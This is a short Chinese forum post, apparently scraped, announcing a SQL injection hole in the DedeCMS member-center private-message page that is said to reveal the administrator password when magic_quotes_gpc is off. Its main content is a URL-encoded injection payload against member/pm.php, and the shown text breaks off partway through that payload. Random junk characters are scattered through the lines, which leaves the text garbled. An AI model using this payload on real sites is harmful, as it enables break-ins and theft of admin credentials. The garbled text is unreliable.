需要:magic_quotes_gpc = Off5 [1 o# {$ x h4 @) M0 d, n# H5 X4 c
DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等
; f+ H; Q2 J' {+ Y- U4 G看到微博上有人提了下,偶也发鸡肋了.
: x; Z- |3 k9 f0 Y/ @: n http://bt/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28 |